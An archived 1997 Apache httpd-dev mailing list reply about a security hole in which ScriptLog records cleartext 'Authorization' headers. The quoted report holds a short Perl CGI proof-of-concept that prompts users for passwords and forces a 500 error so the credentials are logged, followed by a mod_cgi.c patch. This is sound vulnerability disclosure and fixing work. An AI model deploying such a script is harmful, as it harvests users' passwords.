httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Brian Behlendorf <br...@organic.com>
Subject Re: security hole with ScriptLog
Date Sun, 12 Jan 1997 04:50:43 GMT

A patch which closes stdin to the script as soon as the script starts
sending stdout stuff would fix this, as with an earlier hole.  I still want to
hear whether this is doable or silly or not.

	Brian

On Sun, 12 Jan 1997, Rob Hartill wrote:
> Apart from the fact that ScriptLog can dump the "Authorization" header
> into the log when authorized scripts barf, it's not too difficult to
> difficult to come up with ways to trigger Auth in other areas of the
> server to capture passwords in the clear.
> 
> Here's a script that causes a 500 error when it thinks it's got the
> password from the user..
> 
> 
> #!/usr/local/bin/perl
> 
> open(GOTCHA, "+</tmp/grab");
> while(<GOTCHA>) {
> 	chomp; 
> 	if ($ENV{REMOTE_HOST} eq $_) {   # been here before ? if so, die.
>              exit;  # 500 error, password now in ScriptLog
> 	}
> }
> 
> # Prompt the user for a password
> print "Status: 401\r\nWWW-Authenticate: Basic realm=\"not-mine\"\r\n\r\n";
> 
> # remember who's been sent a 401
> print GOTCHA "$ENV{REMOTE_HOST}\n"; close GOTCHA;
> 
> -=-=-=-=-=-
> 
> This'll cover the hole until someone works out a way to enable this feature
> safely.
> 
> Index: mod_cgi.c
> ===================================================================
> RCS file: /export/home/cvs/apache/src/mod_cgi.c,v
> retrieving revision 1.4
> diff -u -r1.4 mod_cgi.c
> --- mod_cgi.c   1997/01/02 03:34:57     1.4
> +++ mod_cgi.c   1997/01/12 01:29:12
> @@ -212,6 +212,7 @@
>      fputs("%request\n", f);
>      for (i = 0; i < hdrs_arr->nelts; ++i) {
>        if (!hdrs[i].key) continue;
> +      if (!strcmp(hdrs[i].key, "Authorization")) continue;
>        fprintf(f, "%s: %s\n", hdrs[i].key, hdrs[i].val);
>      }
>      if ((r->method_number == M_POST || r->method_number == M_PUT)
> 
> 
> 

--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--
brian@organic.com  www.apache.org  hyperreal.com  http://www.organic.com/JOBS


Mime
View raw message